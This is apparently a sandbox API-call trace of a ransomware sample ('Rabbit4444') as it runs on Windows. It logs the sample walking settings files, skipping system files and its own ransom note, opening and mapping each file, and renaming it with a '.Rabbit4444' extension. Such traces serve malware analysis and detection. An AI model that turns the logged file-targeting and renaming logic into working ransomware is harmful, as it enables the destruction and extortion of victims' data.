lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x573d64a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x573d64a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", cAlternateFileName="AA896E~1.SET")) returned 1 [0056.627] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.627] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.627] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.627] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", lpString2=".") returned 1 [0056.627] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", lpString2="..") returned 1 [0056.627] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", lpString2="windows") returned -1 [0056.627] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.627] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.627] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", lpString2="boot") returned -1 [0056.627] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.627] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.627] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms" | out: lpString1="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms") returned="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms" [0056.627] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.627] lstrlenW (lpString="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms") returned 53 [0056.627] lstrlenW (lpString="Rabbit4444") returned 10 [0056.627] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.627] lstrlenW (lpString=".dll") returned 4 [0056.627] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.627] lstrlenW (lpString=".lnk") returned 4 [0056.627] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.628] lstrlenW (lpString=".ini") returned 4 [0056.628] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.628] lstrlenW (lpString=".sys") returned 4 [0056.628] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.628] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkDirectAccess.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkdirectaccess.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.628] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.628] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14793864234) returned 1 [0056.628] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1102) returned 1 [0056.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0056.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0056.628] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.630] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.631] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.631] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.632] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14794239589) returned 1 [0056.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0056.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0056.632] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.632] CloseHandle (hObject=0x298) returned 1 [0056.632] CloseHandle (hObject=0x278) returned 1 [0056.632] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkDirectAccess.settingcontent-ms.Rabbit4444") returned 181 [0056.632] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkDirectAccess.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkdirectaccess.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkDirectAccess.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkdirectaccess.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.633] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5df2072, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5df2072, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageNetworkEthernet.settingcontent-ms", cAlternateFileName="AA39CE~1.SET")) returned 1 [0056.633] lstrcmpiW (lpString1="AAA_SettingsPageNetworkEthernet.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.633] lstrcmpiW (lpString1="AAA_SettingsPageNetworkEthernet.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.633] lstrcmpiW (lpString1="AAA_SettingsPageNetworkEthernet.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.633] lstrcmpiW (lpString1="AAA_SettingsPageNetworkEthernet.settingcontent-ms", lpString2=".") returned 1 [0056.633] lstrcmpiW (lpString1="AAA_SettingsPageNetworkEthernet.settingcontent-ms", lpString2="..") returned 1 [0056.633] lstrcmpiW (lpString1="AAA_SettingsPageNetworkEthernet.settingcontent-ms", lpString2="windows") returned -1 [0056.633] lstrcmpiW (lpString1="AAA_SettingsPageNetworkEthernet.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.633] lstrcmpiW (lpString1="AAA_SettingsPageNetworkEthernet.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.633] lstrcmpiW (lpString1="AAA_SettingsPageNetworkEthernet.settingcontent-ms", lpString2="boot") returned -1 [0056.633] lstrcmpiW (lpString1="AAA_SettingsPageNetworkEthernet.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.633] lstrcmpiW (lpString1="AAA_SettingsPageNetworkEthernet.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.633] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageNetworkEthernet.settingcontent-ms" | out: lpString1="AAA_SettingsPageNetworkEthernet.settingcontent-ms") returned="AAA_SettingsPageNetworkEthernet.settingcontent-ms" [0056.633] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkEthernet.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.633] lstrlenW (lpString="AAA_SettingsPageNetworkEthernet.settingcontent-ms") returned 49 [0056.633] lstrlenW (lpString="Rabbit4444") returned 10 [0056.634] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.634] lstrlenW (lpString=".dll") returned 4 [0056.634] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.634] lstrlenW (lpString=".lnk") returned 4 [0056.634] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.634] lstrlenW (lpString=".ini") returned 4 [0056.634] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.634] lstrlenW (lpString=".sys") returned 4 [0056.634] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.634] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkEthernet.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkethernet.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.634] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.634] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14794477171) returned 1 [0056.634] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1082) returned 1 [0056.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0056.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0056.634] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.635] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.636] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.636] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.636] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.636] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.636] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14794703864) returned 1 [0056.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0056.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0056.636] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.636] CloseHandle (hObject=0x298) returned 1 [0056.637] CloseHandle (hObject=0x278) returned 1 [0056.637] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkEthernet.settingcontent-ms.Rabbit4444") returned 177 [0056.637] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkEthernet.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkethernet.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkEthernet.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkethernet.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.637] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615f6b5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x615f6b5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", cAlternateFileName="AAF71D~1.SET")) returned 1 [0056.637] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.637] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.637] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.637] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", lpString2=".") returned 1 [0056.637] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", lpString2="..") returned 1 [0056.637] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", lpString2="windows") returned -1 [0056.638] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.638] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.638] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", lpString2="boot") returned -1 [0056.638] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.638] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.638] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms" | out: lpString1="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms") returned="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms" [0056.638] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.638] lstrlenW (lpString="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms") returned 56 [0056.638] lstrlenW (lpString="Rabbit4444") returned 10 [0056.638] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.638] lstrlenW (lpString=".dll") returned 4 [0056.638] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.638] lstrlenW (lpString=".lnk") returned 4 [0056.638] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.638] lstrlenW (lpString=".ini") returned 4 [0056.638] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.638] lstrlenW (lpString=".sys") returned 4 [0056.638] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.638] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkmobilebroadband.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.639] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.639] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14794937914) returned 1 [0056.639] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1117) returned 1 [0056.639] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.639] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0056.639] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0056.640] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0056.641] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.641] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.641] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.641] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.641] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14795189424) returned 1 [0056.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.641] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0056.641] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.641] CloseHandle (hObject=0x298) returned 1 [0056.641] CloseHandle (hObject=0x278) returned 1 [0056.641] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms.Rabbit4444") returned 184 [0056.642] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkmobilebroadband.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkmobilebroadband.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.642] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63292fa, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x63292fa, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", cAlternateFileName="AA6FDD~1.SET")) returned 1 [0056.642] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.642] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.642] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.642] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", lpString2=".") returned 1 [0056.642] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", lpString2="..") returned 1 [0056.642] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", lpString2="windows") returned -1 [0056.642] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.642] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.642] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", lpString2="boot") returned -1 [0056.642] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.642] lstrcmpiW (lpString1="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.642] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms" | out: lpString1="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms") returned="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms" [0056.643] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.643] lstrlenW (lpString="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms") returned 54 [0056.643] lstrlenW (lpString="Rabbit4444") returned 10 [0056.643] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.643] lstrlenW (lpString=".dll") returned 4 [0056.643] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.643] lstrlenW (lpString=".lnk") returned 4 [0056.643] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.643] lstrlenW (lpString=".ini") returned 4 [0056.643] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.643] lstrlenW (lpString=".sys") returned 4 [0056.643] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.643] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkmobilehotspot.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.643] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.643] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14795411393) returned 1 [0056.643] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1107) returned 1 [0056.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0056.644] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0056.645] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0056.646] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.646] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.646] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.646] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 